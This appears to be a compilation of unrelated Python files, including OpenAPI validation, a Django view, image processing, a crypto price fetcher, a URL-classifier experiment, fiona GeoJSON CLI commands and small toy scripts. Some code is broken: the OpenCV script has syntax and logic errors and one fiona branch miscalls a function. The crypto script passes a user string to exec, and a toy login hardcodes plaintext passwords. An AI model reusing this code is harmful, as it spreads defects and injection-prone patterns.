register to backend application
This will be automatically triggered if the app is passed into the
init step.
"""
self.app = app
self.backend.register_route(self.app)
@property
def spec(self):
"""
get the OpenAPI spec
"""
if not hasattr(self, "_spec"):
self._spec = self._generate_spec()
return self._spec
def bypass(self, func: Callable):
"""
bypass rules for routes (mode defined in config)
:normal: collect all the routes exclude those decorated by other
`SpecTree` instance
:greedy: collect all the routes
:strict: collect all the routes decorated by this instance
"""
if self.config.mode == ModeEnum.greedy:
return False
elif self.config.mode == ModeEnum.strict:
return getattr(func, "_decorator", None) != self
else:
decorator = getattr(func, "_decorator", None)
return bool(decorator and decorator != self)
def validate(
self,
query: Optional[ModelType] = None,
json: Optional[ModelType] = None,
form: Optional[ModelType] = None,
headers: Optional[ModelType] = None,
cookies: Optional[ModelType] = None,
resp: Optional[Response] = None,
tags: Sequence = (),
security: Any = None,
deprecated: bool = False,
before: Optional[Callable] = None,
after: Optional[Callable] = None,
validation_error_status: int = 0,
path_parameter_descriptions: Optional[Mapping[str, str]] = None,
skip_validation: bool = False,
operation_id: Optional[str] = None,
) -> Callable:
"""
- validate query, json, headers in request
- validate response body and status code
- add tags to this API route
- add security to this API route
:param query: `pydantic.BaseModel`, query in uri like `?name=value`
:param json: `pydantic.BaseModel`, JSON format request body
:param form: `pydantic.BaseModel`, form-data request body
:param headers: `pydantic.BaseModel`, if you have specific headers
:param cookies: `pydantic.BaseModel`, if you have cookies for this route
:param resp: `spectree.Response`
:param tags: a tuple of strings or :class:`spectree.models.Tag`
:param security: dict with security config for current route and method
:param deprecated: bool, if endpoint is marked as deprecated
:param before: :meth:`spectree.utils.default_before_handler` for
specific endpoint
:param after: :meth:`spectree.utils.default_after_handler` for
specific endpoint
:param validation_error_status: The response status code to use for the
specific endpoint, in the event of a validation error. If not specified,
the global `validation_error_status` is used instead, defined
in :meth:`spectree.spec.SpecTree`.
:param path_parameter_descriptions: A dictionary of path parameter names and
their description.
:param operation_id: a string override for operationId for the given endpoint
"""
# If the status code for validation errors is not overridden on the level of
# the view function, use the globally set status code for validation errors.
if validation_error_status == 0:
validation_error_status = self.validation_error_status
def decorate_validation(func: Callable):
# for sync framework
@wraps(func)
def sync_validate(*args: Any, **kwargs: Any):
return self.backend.validate(
func,
query,
json,
form,
headers,
cookies,
resp,
before or self.before,
after or self.after,
validation_error_status,
skip_validation,
*args,
**kwargs,
)
# for async framework
@wraps(func)
async def async_validate(*args: Any, **kwargs: Any):
return await self.backend.validate(
func,
query,
json,
form,
headers,
cookies,
resp,
before or self.before,
after or self.after,
validation_error_status,
skip_validation,
*args,
**kwargs,
)
validation: FunctionDecorator = (
async_validate if self.backend.ASYNC else sync_validate # type: ignore
)
if self.config.annotations:
nonlocal query, json, form, headers, cookies
annotations = get_type_hints(func)
query = annotations.get("query", query)
json = annotations.get("json", json)
form = annotations.get("form", form)
headers = annotations.get("headers", headers)
cookies = annotations.get("cookies", cookies)
# register
for name, model in zip(
("query", "json", "form", "headers", "cookies"),
(query, json, form, headers, cookies),
):
if model is not None:
model_key = self._add_model(model=model)
setattr(validation, name, model_key)
if resp:
# Make sure that the endpoint specific status code and data model for
# validation errors shows up in the response spec.
resp.add_model(
validation_error_status, self.validation_error_model, replace=False
)
for model in resp.models:
self._add_model(model=model)
validation.resp = resp
if tags:
validation.tags = tags
validation.security = security
validation.deprecated = deprecated
validation.path_parameter_descriptions = path_parameter_descriptions
validation.operation_id = operation_id
# register decorator
validation._decorator = self
return validation
return decorate_validation
def _add_model(self, model: ModelType) -> str:
"""
unified model processing
"""
model_key = self.naming_strategy(model)
self.models[model_key] = deepcopy(
get_model_schema(
model=model,
naming_strategy=self.naming_strategy,
nested_naming_strategy=self.nested_naming_strategy,
)
)
return model_key
def _generate_spec(self) -> Dict[str, Any]:
"""
generate OpenAPI spec according to routes and decorators
"""
routes: Dict[str, Dict] = defaultdict(dict)
tags = {}
for route in self.backend.find_routes():
for method, func in self.backend.parse_func(route):
if self.backend.bypass(func, method) or self.bypass(func):
continue
path_parameter_descriptions = getattr(
func, "path_parameter_descriptions", None
)
path, parameters = self.backend.parse_path(
route, path_parameter_descriptions
)
name = parse_name(func)
summary, desc = parse_comments(func)
func_tags = getattr(func, "tags", ())
for tag in func_tags:
if str(tag) not in tags:
tags[str(tag)] = (
tag.dict() if isinstance(tag, Tag) else {"name": tag}
)
routes[path][method.lower()] = {
"summary": summary or f"{name} <{method}>",
"operationId": self.backend.get_func_operation_id(
func, path, method
),
"description": desc or "",
"tags": [str(x) for x in getattr(func, "tags", ())],
"parameters": parse_params(func, parameters[:], self.models),
"responses": parse_resp(func, self.naming_strategy),
}
security = getattr(func, "security", None)
if security is not None:
routes[path][method.lower()]["security"] = get_security(security)
deprecated = getattr(func, "deprecated", False)
if deprecated:
routes[path][method.lower()]["deprecated"] = deprecated
request_body = parse_request(func)
if request_body:
routes[path][method.lower()]["requestBody"] = request_body
spec: Dict[str, Any] = {
"openapi": self.config.openapi_version,
"info": self.config.openapi_info(),
"tags": list(tags.values()),
"paths": {**routes},
"components": {
"schemas": {**self.models, **self._get_model_definitions()},
},
}
if self.config.servers:
spec["servers"] = [
server.dict(exclude_none=True) for server in self.config.servers
]
if self.config.security_schemes:
spec["components"]["securitySchemes"] = {
scheme.name: scheme.data.dict(exclude_none=True, by_alias=True)
for scheme in self.config.security_schemes
}
spec["security"] = get_security(self.config.security)
return spec
def _get_model_definitions(self) -> Dict[str, Any]:
"""
handle nested models
"""
definitions = {}
for name, schema in self.models.items():
if "definitions" in schema:
for key, value in schema["definitions"].items():
composed_key = self.nested_naming_strategy(name, key)
if composed_key not in definitions:
definitions[composed_key] = value
del schema["definitions"]
return definitions
|
from _typeshed import Incomplete
def uniform_random_intersection_graph(n, m, p, seed: Incomplete | None = None): ...
def k_random_intersection_graph(n, m, k, seed: Incomplete | None = None): ...
def general_random_intersection_graph(n, m, p, seed: Incomplete | None = None): ...
|
from django.shortcuts import render
import requests
# Create your views here.
def HomeView(request):
return render(request, 'project/home.html', {})
|
import cv2, os
import numpy as np
#切换工作目录
os.chdir(r'D:\application\Coding\Image Processing\CH03\DIP3E_CH03_Original_Images\DIP3E_Original_Images_CH03')
if os.getcwd() == r'D:\application\Coding\Image Processing\CH03\DIP3E_CH03_Original_Images\DIP3E_Original_Images_CH03':
print('Transformation Function:\n1. inverse\n2. logarithmic\n3. idempotent\n')
trans_type = input('Choose: ')
#读取图片
img = cv2.imread('Fig0304(a)(breast_digital_Xray).tif', 0)
if trans_type == '1': #反转变换
f = lambda img: 255 - img\
new_img = f(img)
elif trans_type == '2': #对数变换
c = 255/math.log(2)/8
new_img = img.astype('int32')
new_img += 1
new_img = np.log(new_img)
new_img *= c
new_img = new_img.astype('uint8')
elif trans_type == '3': #幂等变换
degree = float(input('\nDegree: ')) #变换的阶数
f = lambda img: img**degree/(255**(degree - 1))
new_img = f(img.astype('int32')).astype('uint8')
else: #输入无效
print('Invalid Input')
exit()
new_img = img.copy().fill(0)
cv2.imshow('New Img', new_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
"""
Minimal setup for listmycmds
"""
DEPENDENCIES = ['argh']
from setuptools import setup, find_packages
setup(name='listmycmds',
version='1.0',
py_modules=['listmycmds_for_setup', 'listmycmds'],
entry_points={'console_scripts': ['listmycmds=listmycmds_for_setup:main']},
install_requires=DEPENDENCIES
)
|
from pycoingecko import CoinGeckoAPI
import pandas as pd
pd.set_option('float_format', '{:.5f}'.format)
#---------------------------- API Call
cg = CoinGeckoAPI()
#---------------------------- Get Data
def crypto_data(crypto):
list_crypto = cg.get_coins_list()
df_crypto = pd.DataFrame(list_crypto)
exec("%s = %d" % (crypto,2))
lst_365 = cg.get_coin_market_chart_by_id(id=df_crypto['id'].loc[df_crypto['symbol'] == crypto].values[0], vs_currency='usd', days=365)
prices = []
time = []
volume = []
volume_to_marketcap = []
for i in range(len(lst_365['prices'])):
prices.append(lst_365['prices'][i][1])
for i in range(len(lst_365['prices'])):
time.append(int(lst_365['prices'][i][0]/1000))
for i in range(len(lst_365['market_caps'])):
volume_to_marketcap.append((lst_365['total_volumes'][i][1]+1)/(lst_365['market_caps'][i][1]+1))
for i in range(len(lst_365['total_volumes'])):
volume.append(lst_365['total_volumes'][i][1])
df = pd.DataFrame({'Date':time,
'Close': prices,
'Volume': volume,
'V_to_M':volume_to_marketcap})
df.index = pd.to_datetime(df['Date'], unit='s')
vars()[crypto] = df.drop(columns=['Date'])
return vars()[crypto]
|
import os
import sys
import re
import random
import math
import matplotlib
import pandas as pd
import numpy as np
import ipaddress as ip
from os.path import split
from urllib.parse import urlparse
import matplotlib.pyplot as plt
import sklearn.ensemble as ek
from sklearn.model_selection import train_test_split
from sklearn.feature_selection import SelectFromModel
from sklearn import model_selection, tree, linear_model
from sklearn.externals import joblib
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.tree import tree, DecisionTreeClassifier
from sklearn.naive_bayes import MultinomialNB, GaussianNB
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn import metrics
from sklearn.pipeline import make_pipeline
from sklearn import preprocessing
from sklearn import svm
from sklearn.feature_selection import SelectKBest
from sklearn.linear_model import LogisticRegression
#matplotlib inline
#custom tokenizer for URLs.
#first split - "/"
#second split - "-"
#third split - "."
#remove ".com" (also "http://", but we dont have "http://" in our dataset)
def getTokens(input):
tokensBySlash = str(input.encode('utf-8')).split('/')
allTokens = []
for i in tokensBySlash:
tokens = str(i).split('-')
tokensByDot = []
for j in range(0,len(tokens)):
tempTokens = str(tokens[j]).split('.')
tokensByDot = tokensByDot + tempTokens
allTokens = allTokens + tokens + tokensByDot
allTokens = list(set(allTokens))
if 'com' in allTokens:
allTokens.remove('com')
return allTokens
#function to remove "http://" from URL
def trim(url):
return re.match(r'(?:\w*://)?(?:.*\.)?([a-zA-Z-1-9]*\.[a-zA-Z]{1,}).*', url).groups()[0]
df = pd.read_csv(r'C:\Users\Kephas\Desktop\FinalProject\dataset.csv',',',error_bad_lines=False)
df = df.sample(frac=1)
df = df.sample(frac=1).reset_index(drop=True)
df.head()
#displaying 5 records
len(df)
#data['url'].values
x = df.iloc[:,0:1].values
y = df.iloc[:,1].values
#convert it into numpy array and shuffle the dataset
df = np.array(df)
random.shuffle(df)
#convert text data into numerical data for machine learning models
y = [d[1] for d in df]
corpus = [d[0] for d in df]
vectorizer = TfidfVectorizer(tokenizer=getTokens)
X = vectorizer.fit_transform(corpus)
#split the data set inot train and test
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=100)
#prepare the model
lgr = LogisticRegression()
lgr.fit(X_train, y_train)
#make model prediction for the testing class
y_pred_class = lgr.predict(X_test)
print("Accuracy for LRG",lgr.score(X_test, y_test))
Dt = DecisionTreeClassifier()
Dt.fit(X_train, y_train)
y_pred_class = Dt.predict(X_test)
print("Accuracy for DT ",Dt.score(X_test, y_test))
#prepare the model
NB = MultinomialNB()
NB.fit(X_train, y_train)
y_pred_class = NB.predict(X_test)
print("Accuracy for MNB",NB.score(X_test, y_test))
predicted = lgr.predict(X_test)
cm = confusion_matrix(y_test, predicted)
print(cm)
print("False positive rate : %.2f %%" % ((cm[0][1] / float(sum(cm[0])))*100))
print('False negative rate : %.2f %%' % ( (cm[1][0] / float(sum(cm[1]))*100)))
report = classification_report(y_test, predicted)
print(report)
# Plot with Labels
plt.clf()
plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Wistia)
plt.title('Confusion Matrix for Logistic Regression ')
#sns.heatmap(matrix,annot=True,fmt="d")
# Set x-axis label
classNames = ['Negative','Positive']
plt.xlabel('Predicted label')
# Set y-axis label
plt.ylabel('True label')
tick_marks = np.arange(len(classNames))
plt.xticks(tick_marks, classNames, rotation=45)
plt.yticks(tick_marks, classNames)
s = [['TN','FP'], ['FN', 'TP']]
for i in range(2):
for j in range(2):
plt.text(j,i, str(s[i][j])+" = "+str(cm[i][j]))
plt.show()
predicted = Dt.predict(X_test)
cm = confusion_matrix(y_test, predicted)
print(cm)
print("False positive rate : %.2f %%" % ((cm[0][1] / float(sum(cm[0])))*100))
print('False negative rate : %.2f %%' % ( (cm[1][0] / float(sum(cm[1]))*100)))
report = classification_report(y_test, predicted)
print(report)
# Plot with Labels
plt.clf()
plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Wistia)
plt.title('Confusion Matrix for Decision Tree ')
#sns.heatmap(matrix,annot=True,fmt="d")
# Set x-axis label
classNames = ['Negative','Positive']
plt.xlabel('Predicted label')
# Set y-axis label
plt.ylabel('True label')
tick_marks = np.arange(len(classNames))
plt.xticks(tick_marks, classNames, rotation=45)
plt.yticks(tick_marks, classNames)
s = [['TN','FP'], ['FN', 'TP']]
for i in range(2):
for j in range(2):
plt.text(j,i, str(s[i][j])+" = "+str(cm[i][j]))
plt.show()
predicted = NB.predict(X_test)
cm = confusion_matrix(y_test, predicted)
print(cm)
print("False positive rate : %.2f %%" % ((cm[0][1] / float(sum(cm[0])))*100))
print('False negative rate : %.2f %%' % ( (cm[1][0] / float(sum(cm[1]))*100)))
report = classification_report(y_test, predicted)
print(report)
# Plot with Labels
plt.clf()
plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Wistia)
plt.title('Confusion Matrix for Decision Tree ')
#sns.heatmap(matrix,annot=True,fmt="d")
# Set x-axis label
classNames = ['Negative','Positive']
plt.xlabel('Predicted label')
# Set y-axis label
plt.ylabel('True label')
tick_marks = np.arange(len(classNames))
plt.xticks(tick_marks, classNames, rotation=45)
plt.yticks(tick_marks, classNames)
s = [['TN','FP'], ['FN', 'TP']]
for i in range(2):
for j in range(2):
plt.text(j,i, str(s[i][j])+" = "+str(cm[i][j]))
plt.show()
model = { "DecisionTree":tree.DecisionTreeClassifier(max_depth=10),
"MNB":MultinomialNB(),
"LogisticRegression":LogisticRegression()
}
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y ,test_size=0.5)
results = {}
for algo in model:
clf = model[algo]
clf.fit(X_train,y_train)
score = clf.score(X_test,y_test)
print ("%s : %.3f " % (algo, score))
results[algo] = score
winner = max(results, key=results.get)
print("Best algorithm: ", winner)
|
# Reverse Maker
# Done
# By Efrain
while True:
reverse = input("Enter A Word To Be Flipped: ")[::-1]
print(reverse)
|
def login(ac, id, pw): #ac = account
if id in ac:
if pw == ac[id]:
print("%s님이 로그인했습니다."%id)
else:
print("비밀번호가 다릅니다.")
else:
print("등록되지 않은 아이디입니다.")
account = {"pomin615":"0123", "thdehdduf20":"4567"}
uid = input("ID : ")
upw = input("PW : ")
login(account,uid,upw)
|
st = input()
st = st.replace("apple","NULL")
st = st.replace("peach", "apple")
st = st.replace("NULL", "peach")
print(st)
|
from functools import partial
import itertools
import json
import logging
import sys
import warnings
import click
from cligj import (
compact_opt, files_in_arg, indent_opt,
sequence_opt, precision_opt, use_rs_opt)
import fiona
from fiona.transform import transform_geom
from .helpers import obj_gen
from . import options
FIELD_TYPES_MAP_REV = dict([(v, k) for k, v in fiona.FIELD_TYPES_MAP.items()])
warnings.simplefilter('default')
def make_ld_context(context_items):
"""Returns a JSON-LD Context object.
See http://json-ld.org/spec/latest/json-ld."""
ctx = {
"@context": {
"geojson": "http://ld.geojson.org/vocab#",
"Feature": "geojson:Feature",
"FeatureCollection": "geojson:FeatureCollection",
"GeometryCollection": "geojson:GeometryCollection",
"LineString": "geojson:LineString",
"MultiLineString": "geojson:MultiLineString",
"MultiPoint": "geojson:MultiPoint",
"MultiPolygon": "geojson:MultiPolygon",
"Point": "geojson:Point",
"Polygon": "geojson:Polygon",
"bbox": {
"@container": "@list",
"@id": "geojson:bbox"
},
"coordinates": "geojson:coordinates",
"datetime": "http://www.w3.org/2006/time#inXSDDateTime",
"description": "http://purl.org/dc/terms/description",
"features": {
"@container": "@set",
"@id": "geojson:features"
},
"geometry": "geojson:geometry",
"id": "@id",
"properties": "geojson:properties",
"start": "http://www.w3.org/2006/time#hasBeginning",
"stop": "http://www.w3.org/2006/time#hasEnding",
"title": "http://purl.org/dc/terms/title",
"type": "@type",
"when": "geojson:when"
}
}
for item in context_items or []:
t, uri = item.split("=")
ctx[t.strip()] = uri.strip()
return ctx
def id_record(rec):
"""Converts a record's id to a blank node id and returns the record."""
rec['id'] = '_:f%s' % rec['id']
return rec
# Cat command
@click.command(short_help="Concatenate and print the features of datasets")
@files_in_arg
@precision_opt
@indent_opt
@compact_opt
@click.option('--ignore-errors/--no-ignore-errors', default=False,
help="log errors but do not stop serialization.")
@options.dst_crs_opt
@use_rs_opt
@click.option('--bbox', default=None, metavar="w,s,e,n",
help="filter for features intersecting a bounding box")
@click.pass_context
def cat(ctx, files, precision, indent, compact, ignore_errors, dst_crs,
use_rs, bbox):
"""Concatenate and print the features of input datasets as a
sequence of GeoJSON features."""
verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
logger = logging.getLogger('fio')
dump_kwds = {'sort_keys': True}
if indent:
dump_kwds['indent'] = indent
if compact:
dump_kwds['separators'] = (',', ':')
item_sep = compact and ',' or ', '
try:
with fiona.drivers(CPL_DEBUG=verbosity>2):
for path in files:
with fiona.open(path) as src:
if bbox:
try:
bbox = tuple(map(float, bbox.split(',')))
except ValueError:
bbox = json.loads(bbox)
for i, feat in src.items(bbox=bbox):
if dst_crs or precision > 0:
g = transform_geom(
src.crs, dst_crs, feat['geometry'],
antimeridian_cutting=True,
precision=precision)
feat['geometry'] = g
feat['bbox'] = fiona.bounds(g)
if use_rs:
click.echo(u'\u001e', nl=False)
click.echo(json.dumps(feat, **dump_kwds))
except Exception:
logger.exception("Exception caught during processing")
raise click.Abort()
# Collect command
@click.command(short_help="Collect a sequence of features.")
@precision_opt
@indent_opt
@compact_opt
@click.option('--record-buffered/--no-record-buffered', default=False,
help="Economical buffering of writes at record, not collection "
"(default), level.")
@click.option('--ignore-errors/--no-ignore-errors', default=False,
help="log errors but do not stop serialization.")
@options.src_crs_opt
@click.option('--with-ld-context/--without-ld-context', default=False,
help="add a JSON-LD context to JSON output.")
@click.option('--add-ld-context-item', multiple=True,
help="map a term to a URI and add it to the output's JSON LD context.")
@click.pass_context
def collect(ctx, precision, indent, compact, record_buffered, ignore_errors,
src_crs, with_ld_context, add_ld_context_item):
"""Make a GeoJSON feature collection from a sequence of GeoJSON
features and print it."""
verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
logger = logging.getLogger('fio')
stdin = click.get_text_stream('stdin')
sink = click.get_text_stream('stdout')
dump_kwds = {'sort_keys': True}
if indent:
dump_kwds['indent'] = indent
if compact:
dump_kwds['separators'] = (',', ':')
item_sep = compact and ',' or ', '
if src_crs:
transformer = partial(transform_geom, src_crs, 'EPSG:4326',
antimeridian_cutting=True, precision=precision)
else:
transformer = lambda x: x
first_line = next(stdin)
# If input is RS-delimited JSON sequence.
if first_line.startswith(u'\x1e'):
def feature_gen():
buffer = first_line.strip(u'\x1e')
for line in stdin:
if line.startswith(u'\x1e'):
if buffer:
feat = json.loads(buffer)
feat['geometry'] = transformer(feat['geometry'])
yield feat
buffer = line.strip(u'\x1e')
else:
buffer += line
else:
feat = json.loads(buffer)
feat['geometry'] = transformer(feat['geometry'])
yield feat
else:
def feature_gen():
feat = json.loads(first_line)
feat['geometry'] = transformer(feat['geometry'])
yield feat
for line in stdin:
feat = json.loads(line)
feat['geometry'] = transformer(feat['geometry'])
yield feat
try:
source = feature_gen()
if record_buffered:
# Buffer GeoJSON data at the feature level for smaller
# memory footprint.
indented = bool(indent)
rec_indent = "\n" + " " * (2 * (indent or 0))
collection = {
'type': 'FeatureCollection',
'features': [] }
if with_ld_context:
collection['@context'] = make_ld_context(
add_ld_context_item)
head, tail = json.dumps(collection, **dump_kwds).split('[]')
sink.write(head)
sink.write("[")
# Try the first record.
try:
i, first = 0, next(source)
if with_ld_context:
first = id_record(first)
if indented:
sink.write(rec_indent)
sink.write(
json.dumps(first, **dump_kwds
).replace("\n", rec_indent))
except StopIteration:
pass
except Exception as exc:
# Ignoring errors is *not* the default.
if ignore_errors:
logger.error(
"failed to serialize file record %d (%s), "
"continuing",
i, exc)
else:
# Log error and close up the GeoJSON, leaving it
# more or less valid no matter what happens above.
logger.critical(
"failed to serialize file record %d (%s), "
"quiting",
i, exc)
sink.write("]")
sink.write(tail)
if indented:
sink.write("\n")
raise
# Because trailing commas aren't valid in JSON arrays
# we'll write the item separator before each of the
# remaining features.
for i, rec in enumerate(source, 1):
try:
if with_ld_context:
rec = id_record(rec)
if indented:
sink.write(rec_indent)
sink.write(item_sep)
sink.write(
json.dumps(rec, **dump_kwds
).replace("\n", rec_indent))
except Exception as exc:
if ignore_errors:
logger.error(
"failed to serialize file record %d (%s), "
"continuing",
i, exc)
else:
logger.critical(
"failed to serialize file record %d (%s), "
"quiting",
i, exc)
sink.write("]")
sink.write(tail)
if indented:
sink.write("\n")
raise
# Close up the GeoJSON after writing all features.
sink.write("]")
sink.write(tail)
if indented:
sink.write("\n")
else:
# Buffer GeoJSON data at the collection level. The default.
collection = {'type': 'FeatureCollection'}
if with_ld_context:
collection['@context'] = make_ld_context(
add_ld_context_item)
collection['features'] = [
id_record(rec) for rec in source]
else:
collection['features'] = list(source)
json.dump(collection, sink, **dump_kwds)
sink.write("\n")
except Exception:
logger.exception("Exception caught during processing")
raise click.Abort()
# Distribute command
@click.command(short_help="Distribute features from a collection")
@use_rs_opt
@click.pass_context
def distrib(ctx, use_rs):
"""Print the features of GeoJSON objects read from stdin.
"""
verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
logger = logging.getLogger('fio')
stdin = click.get_text_stream('stdin')
try:
source = obj_gen(stdin)
for i, obj in enumerate(source):
obj_id = obj.get('id', 'collection:' + str(i))
features = obj.get('features') or [obj]
for j, feat in enumerate(features):
if obj.get('type') == 'FeatureCollection':
feat['parent'] = obj_id
feat_id = feat.get('id', 'feature:' + str(i))
feat['id'] = feat_id
if use_rs:
click.echo(u'\u001e', nl=False)
click.echo(json.dumps(feat))
except Exception:
logger.exception("Exception caught during processing")
raise click.Abort()
# Dump command
@click.command(short_help="Dump a dataset to GeoJSON.")
@click.argument('input', type=click.Path(), required=True)
@click.option('--encoding', help="Specify encoding of the input file.")
@precision_opt
@indent_opt
@compact_opt
@click.option('--record-buffered/--no-record-buffered', default=False,
help="Economical buffering of writes at record, not collection "
"(default), level.")
@click.option('--ignore-errors/--no-ignore-errors', default=False,
help="log errors but do not stop serialization.")
@click.option('--with-ld-context/--without-ld-context', default=False,
help="add a JSON-LD context to JSON output.")
@click.option('--add-ld-context-item', multiple=True,
help="map a term to a URI and add it to the output's JSON LD context.")
@click.pass_context
def dump(ctx, input, encoding, precision, indent, compact, record_buffered,
ignore_errors, with_ld_context, add_ld_context_item):
"""Dump a dataset either as a GeoJSON feature collection (the default)
or a sequence of GeoJSON features."""
verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
logger = logging.getLogger('fio')
sink = click.get_text_stream('stdout')
dump_kwds = {'sort_keys': True}
if indent:
dump_kwds['indent'] = indent
if compact:
dump_kwds['separators'] = (',', ':')
item_sep = compact and ',' or ', '
open_kwds = {}
if encoding:
open_kwds['encoding'] = encoding
def transformer(crs, feat):
tg = partial(transform_geom, crs, 'EPSG:4326',
antimeridian_cutting=True, precision=precision)
feat['geometry'] = tg(feat['geometry'])
return feat
try:
with fiona.drivers(CPL_DEBUG=verbosity>2):
with fiona.open(input, **open_kwds) as source:
meta = source.meta
meta['fields'] = dict(source.schema['properties'].items())
if record_buffered:
# Buffer GeoJSON data at the feature level for smaller
# memory footprint.
indented = bool(indent)
rec_indent = "\n" + " " * (2 * (indent or 0))
collection = {
'type': 'FeatureCollection',
'fiona:schema': meta['schema'],
'fiona:crs': meta['crs'],
'features': [] }
if with_ld_context:
collection['@context'] = make_ld_context(
add_ld_context_item)
head, tail = json.dumps(collection, **dump_kwds).split('[]')
sink.write(head)
sink.write("[")
itr = iter(source)
# Try the first record.
try:
i, first = 0, next(itr)
first = transformer(first)
if with_ld_context:
first = id_record(first)
if indented:
sink.write(rec_indent)
sink.write(
json.dumps(first, **dump_kwds
).replace("\n", rec_indent))
except StopIteration:
pass
except Exception as exc:
# Ignoring errors is *not* the default.
if ignore_errors:
logger.error(
"failed to serialize file record %d (%s), "
"continuing",
i, exc)
else:
# Log error and close up the GeoJSON, leaving it
# more or less valid no matter what happens above.
logger.critical(
"failed to serialize file record %d (%s), "
"quiting",
i, exc)
sink.write("]")
sink.write(tail)
if indented:
sink.write("\n")
raise
# Because trailing commas aren't valid in JSON arrays
# we'll write the item separator before each of the
# remaining features.
for i, rec in enumerate(itr, 1):
rec = transformer(rec)
try:
if with_ld_context:
rec = id_record(rec)
if indented:
sink.write(rec_indent)
sink.write(item_sep)
sink.write(
json.dumps(rec, **dump_kwds
).replace("\n", rec_indent))
except Exception as exc:
if ignore_errors:
logger.error(
"failed to serialize file record %d (%s), "
"continuing",
i, exc)
else:
logger.critical(
"failed to serialize file record %d (%s), "
"quiting",
i, exc)
sink.write("]")
sink.write(tail)
if indented:
sink.write("\n")
raise
# Close up the GeoJSON after writing all features.
sink.write("]")
sink.write(tail)
if indented:
sink.write("\n")
else:
# Buffer GeoJSON data at the collection level. The default.
collection = {
'type': 'FeatureCollection',
'fiona:schema': meta['schema'],
'fiona:crs': meta['crs']}
if with_ld_context:
collection['@context'] = make_ld_context(
add_ld_context_item)
collection['features'] = [
id_record(transformer(rec)) for rec in source]
else:
collection['features'] = [transformer(source.crs, rec) for rec in source]
json.dump(collection, sink, **dump_kwds)
except Exception:
logger.exception("Exception caught during processing")
raise click.Abort()
# Load command.
@click.command(short_help="Load GeoJSON to a dataset in another format.")
@click.argument('output', type=click.Path(), required=True)
@click.option('-f', '--format', '--driver', required=True,
help="Output format driver name.")
@options.src_crs_opt
@click.option(
'--dst-crs', '--dst_crs',
help="Destination CRS. Defaults to --src-crs when not given.")
@click.option(
'--sequence / --no-sequence', default=False,
help="Specify whether the input stream is a LF-delimited sequence of GeoJSON "
"features (the default) or a single GeoJSON feature collection.")
@click.pass_context
def load(ctx, output, driver, src_crs, dst_crs, sequence):
"""Load features from JSON to a file in another format.
The input is a GeoJSON feature collection or optionally a sequence of
GeoJSON feature objects."""
verbosity = (ctx.obj and ctx.obj['verbosity']) or 2
logger = logging.getLogger('fio')
stdin = click.get_text_stream('stdin')
dst_crs = dst_crs or src_crs
if src_crs and dst_crs and src_crs != dst_crs:
transformer = partial(transform_geom, src_crs, dst_crs,
antimeridian_cutting=True, precision=-1)
else:
transformer = lambda x: x
first_line = next(stdin)
# If input is RS-delimited JSON sequence.
if first_line.startswith(u'\x1e'):
def feature_gen():
buffer = first_line.strip(u'\x1e')
for line in stdin:
if line.startswith(u'\x1e'):
if buffer:
feat = json.loads(buffer)
feat['geometry'] = transformer(feat['geometry'])
yield feat
buffer = line.strip(u'\x1e')
else:
buffer += line
else:
feat = json.loads(buffer)
feat['geometry'] = transformer(feat['geometry'])
yield feat
elif sequence:
def feature_gen():
yield json.loads(first_line)
for line in stdin:
feat = json.loads(line)
feat['geometry'] = transformer(feat['geometry'])
yield feat
else:
def feature_gen():
text = "".join(itertools.chain([first_line], stdin))
for feat in json.loads(text)['features']:
feat['geometry'] = transformer(feat['geometry'])
yield feat
try:
source = feature_gen()
# Use schema of first feature as a template.
# TODO: schema specified on command line?
first = next(source)
schema = {'geometry': first['geometry']['type']}
schema['properties'] = dict([
(k, FIELD_TYPES_MAP_REV.get(type(v)) or 'str')
for k, v in first['properties'].items()])
with fiona.drivers(CPL_DEBUG=verbosity>2):
with fiona.open(
output, 'w',
driver=driver,
crs=dst_crs,
schema=schema) as dst:
dst.write(first)
dst.writerecords(source)
except Exception:
logger.exception("Exception caught during processing")
raise click.Abort()
|
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
tboolean.py: CSG boolean geometry tracetest
=======================================================
For analysis of photon_buffer written by oxrap/cu/generate.cu:tracetest
which is intended for testing geometrical intersection only, with
no propagation.
Unsigned boundaries 1 and 124 all from CSG intersection, the 215 was a
abitrary marker written by evaluative_csg::
In [43]: flg[:100]
Out[43]:
A()sliced
A([[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 123, 0],
[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 123, 0],
[ 0, 0, 123, 0],
[ 0, 0, 1, 215],
[ 0, 0, 123, 0],
[ 0, 0, 124, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
[ 0, 0, 1, 215],
In [46]: np.unique(flg[flg[:,3] == 215][:,2])
Out[46]:
A()sliced
A([ 1, 124], dtype=uint32)
In [48]: count_unique_sorted(flg[:,2]) # unsigned 0-based boundaries
Out[48]:
array([[ 1, 58822],
[ 123, 35537],
[ 124, 5641]], dtype=uint64)
In [57]: t0[np.where(flg[:,2] == 1)]
A([ 149.8889, 149.8889, 349.8889, ..., 348.1284, 349.8889, 349.8889], dtype=float32)
In [58]: t0[np.where(flg[:,2] == 124)]
